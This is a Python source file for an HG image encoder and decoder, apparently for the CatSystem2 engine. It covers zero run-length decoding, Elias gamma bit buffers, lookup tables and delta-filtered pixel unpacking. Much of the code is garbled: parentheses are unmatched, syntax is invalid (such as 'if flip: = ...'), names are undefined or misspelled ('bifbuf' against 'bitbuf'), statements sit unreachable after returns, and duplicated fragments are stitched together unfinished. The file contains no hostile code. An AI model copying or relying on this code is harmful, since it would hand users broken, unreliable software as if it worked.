_CHANGE_ALPHA = (1 << 2)
ADD_ALPHA = _CHANGE_ALPHA | 0
REMOVE_ALPHA = _CHANGE_ALPHA | (1 << 3)
class HgEncoding(object):
"""HgEncoding() -> HG image encoder/decoder
"""
_weighttables:Tuple[List[int], List[int], List[int], List[int]] = make_weight_tables()
_abstables:Tuple[List[int], List[int]] = make_abs_tables()
def __init__(self):
self.pixels = bytearray()
self.options = HgOptions(0)
self.size = Size(0, 0)
self.bpp = 0
self.depth = 0
self.canvassize = Size(0, 0)
self.canvaspos = Point(0, 0)
self.transparent = False
self.origin = Point(0, 0)
def unpack_slicemem(self, data:bytes, cmd:bytes):
block0 = block1 = block2 = block3 = buffer = None
try:
data = memoryview(zlib.decompress(data))
cmd = memoryview(zlib.decompress(cmd))
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = memoryview(bytearray(buflen))
data = data.release()
cmd = cmd.release()
except:
# if isinstance(data, memoryview):
# data.release()
# if isinstance(cmd, memoryview):
# cmd.release()
if isinstance(buffer, memoryview):
buffer.release()
raise
buffer = unpack_datamem(data, cmd)
finally:
if isinstance(data, memoryview):
data.release()
if isinstance(cmd, memoryview):
cmd.release()
if isinstance(buffer, memoryview):
buffer.release()
with memoryview(data) as data:
with memoryview(cmd) as cmd:
buffer = unpack_datamem(data, cmd)
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
_buffer = bytearray(buflen) # already filled with zero-bytes
buffer = unpack_datamem(data, cmd)
memoryblocks = [None] * 4
with memoryview
def unpack_zrle_pt1(self, data:memoryview, cmd:memoryview) -> Tuple[BitBuffer, copyflag, bytearray]:
# with memoryview(zlib.decompress(data)) as data:
# with memoryview(zlib.decompress(cmd)) as cmd:
# return unpack_datamem2(data, cmd)
# def unpack_datamem(self, data:memoryview, cmd:memoryview) -> bytearray:
# data = zlib.decompress(data)
# cmd = zlib.decompress(cmd)
# with memoryview(zlib.decompress(data)) as data:
# with memoryview(zlib.decompress(cmd)) as cmd:
# return unpack_datamem2(data, cmd)
def make_fwd_weight_tables() -> List[Tuple[int], Tuple[int], Tuple[int], Tuple[int]]:
pass
def rgba_image(image:PIL.Image, needalpha:bool=False):
bands = image.getbands()
hasalpha = 'A' in bands or 'a' in bands
if image.mode != 'RGBA' and (needalpha or hasalpha):
image = image.convert('RGBA')
elif image.mode != 'RGB' and (not needalpha and not hasalpha):
image = image.convert('RGB')
return image
def rgba_bytes(image:PIL.Image, needalpha:bool=False, orientation:int=1) -> Tuple[PIL.Image, str]:
image = rgba_image(image, needalpha)
if image.mode == 'RGBA':
bpp = 32
mode = 'BGRA'
elif image.mode == 'RGBA':
bpp = 24
mode = 'BGR'
stride = ((image.width * bpp + 7) // 8 + 3) & ~0x3
return (image.tobytes('raw', 'BGRA', stride, orientation), image.mode)
if image.mode == 'RGBA':
bpp = 32
mode = 'BGRA'
elif image.mode == 'RGBA':
bpp = 24
mode = 'BGR'
stride = ((image.width * bpp + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
if image.mode != 'RGBA' and (image.mode.endswith('A') or image.mode.endswith('a')):
image = image.convert('RGBA')
elif image.mode == 'RGBA':
bitdepth = 32
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
elif image.mode == 'RGB':
bitdepth = 24
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGR', stride, orientation)
elif image.mode == 'L':
bitdepth = 8
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'L', stride, orientation)
elif image.mode == '1':
bitdepth = 1
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', '1', stride, orientation)
else:
#TODO: Auto-convert? or fail?
#image = image.convert('RGBA')
#bitdepth = 32
#stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
#pixels = image.tobytes('raw', 'BGRA', stride, orientation)
raise ValueError('Unsupported image mode {0!r} for writing'.format(image.mode))
def run_tests():
import PIL
import PIL.Image
import PIL.ImageOps
needalpha = False
orientation = 1
imgpath = r"path\to\testimage.png"
with PIL.Image.open(imgpath) as imgfile:
image = rgba_image(imgfile, needalpha)
hasalpha = image.mode == 'RGBA'
mode = image.mode
with memoryview(rgba_bytes(image, needalpha, orientation)):
image.tobytes('raw', 'BGRA', stride, orientation)
image = image.crop(bbox)
if image.mode != 'RGBA' and (image.mode.endswith('A') or image.mode.endswith('a')):
image = image.convert('RGBA')
elif image.mode == 'RGBA':
bitdepth = 32
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGRA', stride, orientation)
elif image.mode == 'RGB':
bitdepth = 24
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'BGR', stride, orientation)
elif image.mode == 'L':
bitdepth = 8
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', 'L', stride, orientation)
elif image.mode == '1':
bitdepth = 1
stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
pixels = image.tobytes('raw', '1', stride, orientation)
else:
#TODO: Auto-convert? or fail?
#image = image.convert('RGBA')
#bitdepth = 32
#stride = ((width * bitdepth + 7) // 8 + 3) & ~0x3
#pixels = image.tobytes('raw', 'BGRA', stride, orientation)
raise ValueError('Unsupported image mode {0!r} for writing'.format(image.mode))
def pack_from_pixels(pixels:bytearray, sliceidx:int, slicelen:int, width:int, height:int, bpp:int, bpc:int, offsetx:int, offsety:int, fullwidth:int, fullheight:int, flip:bool):
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (fullwidth * bytedepth + 3) & ~0x3
colstart = offsetx
colend = offsetx + width
rowstart = offsety + sliceidx
rowend = offsety + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
del colstart, colend, rowstart, rowend
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# buflen = len(buffer)
# sectlen = buflen // 4
sectlen = len(buffer) // 4
# sect0, sect1, sect2, sect3 = sects = range(0, sectlen * 4, sectlen)
abstable = make_abs_tables()[0] # fwd abstable
#table0, table1, table2, table3 = make_weight_tables()
#block0, block1, block2, block3 = blocks = [None] * 4
block0 = block1 = block2 = block3 = None
abstable = bytes(make_abs_tables()[0]) # fwd abstable
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
bufend = (hgslice.index + hgslice.length) * stride
sectlen = slicelen * stride // 4
blocks = bytearray(sectlen * 4)
block0 = block1 = block2 = block3 = None
try:
buffer = memoryview(buffer)
abstable = memoryview(abstable)
# for i, sect in enumerate(range(0, sectlen * 4, sectlen)):
# blocks[i] = buffer[sect:sect + sectlent]
# block0, block1, block2, block3 = blocks
block0 = buffer[sect0:sect0 + sectlen]
block1 = buffer[sect1:sect1 + sectlen]
block2 = buffer[sect2:sect2 + sectlen]
block3 = buffer[sect3:sect3 + sectlen]
buffer = buffer.release()
# normalize pixel buffer into data blocks
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
# val = unpack_from('<I', pixels, src)
# b = abstable[pixels[xy ]]
# v3 = ((b ) & 0x3)
# v2 = ((b >> 2) & 0x3)
# v1 = ((b >> 4) & 0x3)
# v0 = ((b >> 6) & 0x3)
# b = abstable[pixels[xy + 1]]
# v3 |= ((b << 2) & 0xc)
# v2 |= ((b ) & 0xc)
# v1 |= ((b >> 2) & 0xc)
# v0 |= ((b >> 4) & 0xc)
# b = abstable[pixels[xy + 2]]
# v3 |= ((b << 4) & 0x30)
# v2 |= ((b << 2) & 0x30)
# v1 |= ((b ) & 0x30)
# v0 |= ((b >> 2) & 0x30)
# b = abstable[pixels[xy + 3]]
# v3 |= ((b << 6) & 0xc0)
# v2 |= ((b << 4) & 0xc0)
# v1 |= ((b << 2) & 0xc0)
# v0 |= ((b ) & 0xc0)
# v0 = v1 = v2 = v3 = 0
#m = 0x3
for j in range(0, 8, 2):
#for j in range(0, 8, 2): # section mask to byte
#m = 0x3 << j
b = abstable[pixels[xy]]
xy += 1
v3 |= ((b ) & 0x3) << j
v2 |= ((b >> 2) & 0x3) << j
v1 |= ((b >> 4) & 0x3) << j
v0 |= ((b >> 6) & 0x3) << j
#m <<= 2
# b = ((((pixels[src ] >> k) & 0x3)) |
# (((pixels[src + 1] >> k) & 0x3) << 2) |
# (((pixels[src + 2] >> k) & 0x3) << 4) |
# (((pixels[src + 3] >> k) & 0x3) << 6))
# idx |= (((pixels[src] >> k) & 0x3) << j)
# src += 1
block3[i] = v3
block2[i] = v2
block1[i] = v1
block0[i] = v0
#blocks[i] = idx & 0xff
i += 1
# val = (table0[block0[i]] | table1[block1[i]] |
# table2[block2[i]] | table3[block3[i]]))
# pixels[yx ] = invtable[(val ) & 0xff]
# pixels[yx + 1] = invtable[(val >> 8) & 0xff]
# pixels[yx + 2] = invtable[(val >> 16) & 0xff]
# pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
finally:
# if isinstance(pixels, memoryview):
# pixels.release()
# if isinstance(buffer, memoryview):
# buffer.release()
for memitem in (block0, block1, block2, block3, buffer, pixels, abstable): #blocks:
if isinstance(memitem, memoryview):
memitem.release()
# first loop through the entire delta slice and perform absolute transform
for i in range(bufstart, bufend, 1):
delta[i] = abstable[delta[i]]
# Iterate through each section one at a time, each pass
# through delta encodes a different mask (section/block) of bytes
i = 0
# Section masks: [0xc0c0c0c0, 0x30303030, 0x0c0c0c0c, 0x03030303]
for k in range(6, -1, -2): # current section
src = bufstart
for i in range(sectlen): # section iteration
idx = 0
val = unpack_from('<I', delta, src)
b0 = b1 = b2 = b3 = 0
m = 0x3
for j in range(0, 8, 2): # section mask to byte
m = 0x3 << j
b = abstable[delta[]
b3 |= (b ) & m
b >>= 2
b2 |= (b >> 2) & m
b >>= 2
b1 |= (b >> 4) & m
b >>= 2
b0 |= (b >> 6) & m
m <<= 2
b = ((((delta[src ] >> k) & 0x3)) |
(((delta[src + 1] >> k) & 0x3) << 2) |
(((delta[src + 2] >> k) & 0x3) << 4) |
(((delta[src + 3] >> k) & 0x3) << 6))
idx |= (((delta[src] >> k) & 0x3) << j)
src += 1
blocks[i] = idx & 0xff
dst += 1
return blocks
def unpack_data(data:bytes, cmd:bytes) -> bytearray:
buffer = None
try:
data = memoryview(zlib.decompress(data))
cmd = memoryview(zlib.decompress(cmd))
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = memoryview(bytearray(buflen))
off = dataoff = 0
while off < buflen:
runlen = bitbuf.read_eliasgamma()
#
if copyflag:
# Copy non-zero data into ouput buffer
buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
dataoff += runlen
#else skip zero bytes, buffer already filled with zero-bytes
off += runlen
copyflag = not copyflag
return _buffer # underlying bytearray
finally:
# if isinstance(data, memoryview):
# data.release()
# if isinstance(cmd, memoryview):
# cmd.release()
# if isinstance(buffer, memoryview):
# buffer.release()
for memitem in (data, cmd, buffer):
if isinstance(memitem, memoryview):
memitem.release()
def unpack_into_pixels(buffer:bytes, pixels:bytearray, sliceidx:int, slicelen:int, width:int, height:int, bpp:int, bpc:int, offsetx:int, offsety:int, fullwidth:int, fullheight:int, flip:bool):
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (fullwidth * bytedepth + 3) & ~0x3
colstart = offsetx
colend = offsetx + width
rowstart = offsety + sliceidx
rowend = offsety + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
del colstart, colend, rowstart, rowend
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# buflen = len(buffer)
# sectlen = buflen // 4
sectlen = len(buffer) // 4
# sect0, sect1, sect2, sect3 = sects = range(0, sectlen * 4, sectlen)
invtable = make_abs_tables()[1] # inv abstable
table0, table1, table2, table3 = make_weight_tables()
#block0, block1, block2, block3 = blocks = [None] * 4
block0 = block1 = block2 = block3 = None
try:
buffer = memoryview(buffer)
# for i, sect in enumerate(range(0, sectlen * 4, sectlen)):
# blocks[i] = buffer[sect:sect + sectlent]
# block0, block1, block2, block3 = blocks
block0 = buffer[sect0:sect0 + sectlen]
block1 = buffer[sect1:sect1 + sectlen]
block2 = buffer[sect2:sect2 + sectlen]
block3 = buffer[sect3:sect3 + sectlen]
buffer = buffer.release()
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
finally:
# if isinstance(pixels, memoryview):
# pixels.release()
# if isinstance(buffer, memoryview):
# buffer.release()
for memitem in (block0, block1, block2, block3, buffer, pixels): #blocks:
if isinstance(memitem, memoryview):
memitem.release()
# block0, block1, block2, block3 = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# buflen = len(buffer)
# sectlen = buflen // 4
# sect0, sect1, sect2, sect3 = range(slicestart, slicestart + sectlen * 4, sectlen)
# block0, block1, block2, block3 = blocks = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# if not flip:
# normyrange = range(fullstart, fullend, fullstride)
# deltayrange = range(fullstart + stride, fullend, fullstride)
# deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
# else:
# normyrange = range(fullend - stride, fullstart - 1, fullstride)
# deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
# deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# # inverse normalize data blocks into pixel buffer
# i = 0
# for y0 in normyrange:
# for yx in range(y0, y0 + stride, 4):
# val = (table0[block0[i]] | table1[block1[i]] |
# table2[block2[i]] | table3[block3[i]]))
# i += 1
# pixels[yx ] = invtable[(val ) & 0xff]
# pixels[yx + 1] = invtable[(val >> 8) & 0xff]
# pixels[yx + 2] = invtable[(val >> 16) & 0xff]
# pixels[yx + 3] = invtable[(val >> 24) ]
# # undelta RGB(A) channels of each previous pixel in first row
# for x0 in deltaxrange:
# pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# # undelta RGB(A) channels of each previous stride in all but first row
# for y0 in deltayrange:
# for yx in range(y0, y0 + stride, 1)):
# pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
def unpack_data(self, data:bytes, cmd:bytes) -> bytearray:
data = zlib.decompress(data)
cmd = zlib.decompress(cmd)
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
sectlen = buflen // 4
blocks = tuple(bytes(sectlen) for _ in range(4))
buffer = bytearray(buflen) # already filled with zero-bytes
off = dataoff = 0
while off < buflen:
runlen = bitbuf.read_eliasgamma()
#
if copyflag:
# Copy non-zero data into ouput buffer
buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
dataoff += runlen
#else skip zero bytes, buffer already filled with zero-bytes
off += runlen
copyflag = not copyflag
return buffer
def unpack_slice(self, hgslice:HgSlice, hgdata:HgData, pixels:bytearray, stdinfo:StandardInfo, options:HgOptions=HgOptions(0)):
stride = stdinfo.stride
bytedepth = stdinfo.bytedepth
channeldepth = stdinfo.channeldepth
width = stdinfo.width
height = stdinfo.height
canvasx = stdinfo.canvasx
canvasy = stdinfo.canvasy
canvaswidth = stdinfo.canvaswidth
canvasheight = stdinfo.canvasheight
#
#
data = hgdata.data #TODO: zlib.decompress()
cmd = hgdata.cmd #TODO: zlib.decompress()
bifbuf = BitBuffer(cmd, len(cmd))
copyflag = bitbuf.read_flag() # is first run non-zero data?
buflen = bitbuf.read_eliasgamma() # length of output buffer (usually height x stride)
buffer = bytearray(buflen) # already filled with zero-bytes
off = dataoff = 0
while off < buflen:
runlen = bitbuf.read_eliasgamma()
#
if copyflag:
# Copy non-zero data into ouput buffer
buffer[off:off + runlen] = data[dataoff:dataoff + runlen]
dataoff += runlen
#else skip zero bytes, buffer already filled with zero-bytes
off += runlen
copyflag = not copyflag
return buffer
table0, table1, table2, table3 = tables = make_weight_tables()
invtable = make_abs_tables()[1] # inv abstable
pixlen = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
stridefull = (canvaswidth * pixlen + 3) & ~0x3
stridestart = (canvasx * pixlen + 3) & ~0x3
#
slicestride = stride
slicestart = hgslice.index * stridefull + stridestart
sliceend = (hgslice.index + hgslice.length) * stridefull + stridestart
sliceheight = hgslice.length
#
sliceidx = hgslice.index
slicelen = hgslice.len
bytedepth = bpp // 8 # only bpp 24,32 not supported by CS2
stride = (width * pixlen + 3) & ~0x3
fullstride = (canvaswidth * bytedepth + 3) & ~0x3
colstart = canvasx
colend = canvasx + width
rowstart = canvasy + sliceidx
rowend = canvasy + sliceidx + slicelen
fullstart = rowstart * fullstride + colstart * bytedepth
fullend = rowend * fullstride + colend * bytedepth
outstart = (canvasy + sliceidx) * stridefull + canvasx * pixlen
outend = outstart + slicelen * stridefull + stride
canvasidx
#
sectlen = buflen // 4
block0, block1, block2, block3 = blocks = tuple(buffer[i:i + sectlen] for i in range(0, buflen, sectlen))
# bytedepth = (bpp + 7) // 8
# stride = ((width * bpp + 7) // 8 + 3) & ~0x3
# stridefull = ((canvaswidth * bpp + 7) // 8 + 3) & ~0x3
# stridestart = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
# strideend = stridestart + stride
# #
# slicestart = hgslice.index * stride
# sliceend = (hgslice.index + hgslice.length) * stride
# #
# sectlen = buflen // 4
# sect0, sect1, sect2, sect3 = range(slicestart, slicestart + sectlen * 4, sectlen)
u4_s = struct.Struct('<I')
stride = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
fullstride = ((canvasx * bpp + 7) // 8 + 3) & ~0x3
stride = ((width * bpp + 7) // 8 + 3) & ~0x3
bufstart = hgslice.index * stride
#bufend = (hgslice.index + hgslice.length) * stride
sectlen = hgslice.length * stride // 4
#sect0, sect1, sect2, sect3 = range(bufstart, bufstart + sectlen * 4, sectlen)
sect0, sect1, sect2, sect3 = range(0, sectlen * 4, sectlen)
delta = bytearray(sectlen * 4)
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
u4_1 = struct.Struct('<I')
u1_packin = u4_1.pack_into
bi = 0
yrange = range(fullstart, fullend, fullstride)
if flip: yrange = reversed(yrange)
for yj in (reversed(yrange) if flip else yrange): #range(slicestart, sliceend, stridefull):
for xj in range(yj, yj + stride, 4):
u1_packin(pixels, xj, (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
bi += 1
# undelta RGB(A) channels of each previous pixel in first row
for x1, x0 in zip(range(bufstart + bytedepth, bufstart + stride, 1),
range(bufstart, bufstart + stride - bytedepth, 1)):
delta[x1] = (delta[x1] + delta[x0]) & 0xff
yranges (range(fullstart + stride, fullend, fullstride),
range(fullstart, fullend - stride, fullstride)):
if flip: = tuple(reversed(yr) for yr in yranges)
yranges = (range(fullstart + bytedepth, fullstart + stride, fullstride),
range(fullstart, fullstart + stride - bytedepth, fullstride))
if flip: = tuple(reversed(yr) for yr in yranges)
yrange1 = range(bufstart + bytedepth, bufstart + stride, 1)
yrange0 = range(bufstart, bufstart + stride - bytedepth, 1)
if flip: yrange1, yrange0 = reversed(yrange1), reversed(yrange0)
yrange = zip(yrange1, yrange0)
# undelta RGB(A) channels of each previous stride in all but first row
for y1, y0 in zip(range(bufstart + stride, bufstart, 1),
range(bufstart, bufstart - stride, 1)):
delta[y1] = (delta[y1] + delta[y0]) & 0xff
# if flip:
# yrange = range(sliceend - 1, slicestart - 1, -stridefull)
# else:
# yrange = range(slicestart, sliceend, stridefull)
# if flip: yrange = reversed(yrange)
i = 0
yrange = range(slicestart, sliceend, stridefull)
for yj in (reversed(yrange) if flip else yrange): #range(slicestart, sliceend, stridefull):
for xj in range(yj, yj + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
delta[j ] = invtable[(val ) & 0xff]
delta[j + 1] = invtable[(val >> 8) & 0xff]
delta[j + 2] = invtable[(val >> 16) & 0xff]
delta[j + 3] = invtable[(val >> 24) ]
u1_packin(pixels, xj, (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
xranges = (range(bufstart + bytedepth, bufstart + stride, 1),
range(bufstart, bufstart + stride - bytedepth, 1))
if not flip:
normyrange = range(fullstart, fullend, fullstride)
deltayrange = range(fullstart + stride, fullend, fullstride)
deltaxrange = range(fullstart + bytedepth, fullstart + stride, 1)
else:
normyrange = range(fullend - stride, fullstart - 1, fullstride)
deltayrange = range(fullend - stride - stride, fullstart - 1, -fullstride)
deltaxrange = range(fullend - stride + bytedepth, fullend, 1)
# inverse normalize data blocks into pixel buffer
i = 0
for y0 in normyrange:
for yx in range(y0, y0 + stride, 4):
val = (table0[block0[i]] | table1[block1[i]] |
table2[block2[i]] | table3[block3[i]]))
i += 1
pixels[yx ] = invtable[(val ) & 0xff]
pixels[yx + 1] = invtable[(val >> 8) & 0xff]
pixels[yx + 2] = invtable[(val >> 16) & 0xff]
pixels[yx + 3] = invtable[(val >> 24) ]
# undelta RGB(A) channels of each previous pixel in first row
for x0 in deltaxrange:
pixels[x0] = (pixels[x0] + pixels[x0 - bytedepth]) & 0xff
# undelta RGB(A) channels of each previous stride in all but first row
for y0 in deltayrange:
for yx in range(y0, y0 + stride, 1)):
pixels[yx] = (pixels[yx] + pixels[yx - fullstride]) & 0xff
#
### INITIALIZATION TABLES ###
#
#TODO: test import array.array type
def make_weight_tables() -> Tuple[List[int], List[int], List[int], List[int]]:
"""make_weight_tables() -> weight_tables[4][256]
NOTE: These tables contain unsigned integers
>>> make_weight_tables()
([0x0, 0x40, 0x80, 0xc0, 0x4000, 0x4040, 0x4080, ...0xc0c0c080, 0xc0c0c0c0],
[0x0, 0x10, 0x20, 0x30, 0x1000, 0x1010, 0x1020, ...0x30303020, 0x30303030],
[0x0, 0x04, 0x08, 0x0c, 0x0400, 0x0404, 0x0408, ...0x0c0c0c08, 0x0c0c0c0c],
[0x0, 0x01, 0x02, 0x03, 0x0100, 0x0101, 0x0102, ...0x03030302, 0x03030303])
"""
weighttables = tuple([0] * 0x100 for _ in range(4)) # weighttables[4][256]
for i in range(0x100):
val = (((i & 0xc0) << 6 | (i & 0x30)) << 6 | (i & 0xc)) << 6 | (i & 0x3)
#
weighttables[3][i] = val
weighttables[2][i] = val << 2
weighttables[1][i] = val << 4
weighttables[0][i] = val << 6
#
# convert to tuples for performance
return tuple(tuple(t) for t in weighttables)
#TODO: test import array.array type/bytes type
#TODO: Would returning tables as (bytes, bytes) be better for efficiency?
def make_abs_tables() -> Tuple[List[int], List[int]]:
"""make_abs_tables() -> (abstable, inv_abstable)
NOTE: These tables contain unsigned integers
>>> make_abs_tables()
# signed representation (however result is unsigned)
([0, 2, 4, 6, 8, 10, 11, ...5, 3, 1],
[0, -1, 1, -2, 2, -3, 3, ...-127, 127, -128])
"""
abstable = [0] * 0x100
inv_abstable = [0] * 0x100
#
for i, j in zip(range(0x80), range(0, 0x100, 2)): # for(i=0,j=0; i<128; i++,j+=2)
abstable[ i] = j
abstable[0xff-i] = j + 1 # ~i
#
inv_abstable[j ] = i
inv_abstable[j + 1] = 0xff-i # ~i
#
# convert to tuples for performance
return (tuple(abstable), tuple(inv_abstable))
## BIT BUFFER / ELIAS GAMMA CODING ##
class BitBuffer(object):
"""BitBuffer(bytes) -> readable bitbuffer
BitBuffer(bytearray) -> writable bitbuffer
Returns a bitbuffer class for reading and writing individual bits and
positive integers in elias gamma coding.
NOTE: no bounds checking is performed
---
attr : b:bytes, i:next, k:next
order : check k, inc k, read k-1
get_bit : return int [0,1]
get_elias_gamma : inline get_bit()
conditional value |= bit
no __repr__
short local var names
check bit >= 8
local attrs : i, k, b
"""
__slots__ = ('b', 'i', 'k') # buffer, byte index, bit index
def __init__(self, b:bytes):
self.b = self.i = self.k = 0 # buffer, byte index, bit index
# this._bit = 8; // set to check for EOF on next bit
# this._index = index - 1; // Incremented on next bit
# this._remaining = length + 1; // Decremented on next bit
#
# READ BITBUFFER:
#
def read_flag(self) -> bool:
"""Bb.read_flag() -> bool
Reads the next boolean from the bitbuffer as a single bit.
"""
k = self.k # bit index
if k >= 8:
k = 0
self.i += 1
self.k = k + 1
return bool((self.b[self.i] >> k) & 0x1)
#return (self.b[self.i] >> (k )) & 0x1
#
def read_eliasgamma(self) -> int:
"""Bb.read_eliasgamma() -> positive integer
Reads the next positive integer from the bitbuffer in elias gamma coding.
"""
b = self.b # buffer
i = self.i # byte index
k = self.k # bit index
if k >= 8: # incr bit [0:1]
k = 0
i += 1
k += 1
d = 0 # digits
while not ((b[i] >> (k - 1)) & 0x1): # read bit [0:d+1]
d += 1
if k >= 8: # incr bit [1:d+1]
k = 0
i += 1
k += 1
v = 1 << d # value
while d:
d -= 1
if k >= 8: # incr bit [d+1:d*2+1]
k = 0
i += 1
k += 1
if (b[i] >> (k - 1)) & 0x1: # read bit [d+1:d*2+1]
v |= (1 << d)
self.i = i
self.k = k
return v
#
# WRITE BITBUFFER:
#
def write_flag(self, f:bool) -> int:
"""Bb.write_flag(flag) -> integer bits written (always 1)
Writes a boolean to the bitbuffer as a single bit.
"""
k = self.k # bit index
if k >= 8:
k = 0
self.i += 1
# assume buffer is initialized with zero-bytes
self.k = k + 1
if f:
self.b[self.i] |= (1 << k)
#
def write_eliasgamma(self, v:int) -> int:
"""Bb.write_eliasgamma(integer) -> integer bits written
Writes a positive integer to the bitbuffer in elias gamma coding.
"""
if v <= 0:
raise ValueError('Elias gamma coded integer must be positive, not {0!r}'.format(v))
b = self.b # buffer
i = self.i # byte index
k = self.k # bit index
d = 0 # digits
while v >> (d + 1):
d += 1
if k >= 8: # incr bit [0:d]
k = 0
i += 1
k += 1
#b[i] |= (0 << (k - 1) # skip bit [0:d] (false)
if k >= 8: # incr bit [d:d+1]
k = 0
i += 1
k += 1
b[i] |= (1 << (k - 1)) # write bit [d:d+1] (true)
v = 1 << d # value
while d:
d -= 1
if k >= 8: # incr bit [d+1:d*2+1]
k = 0
i += 1
k += 1
if (v >> d) & 0x1: # write bit [d+1:d*2+1] (if true)
b[i] |= 1 << (k - 1):
self.i = i
self.k = k
return v
def sizeof_eliasgamma(v:int) -> int:
"""sizeof_eliasgamma(value) -> integer bit length
Measures the bit length of a positive integer in elias gamma coding.
"""
if v <= 0:
raise ValueError('Elias gamma coded integer must be positive, not {0!r}'.format(v))
d = 0 # digits
while v >> (d + 1):
d += 1
# 1 bit minimum plus 2 bits per digit
return d * 2 + 1
## ZERO RUN-LENGTH CODING ##
# --- format ---
# data bytes:
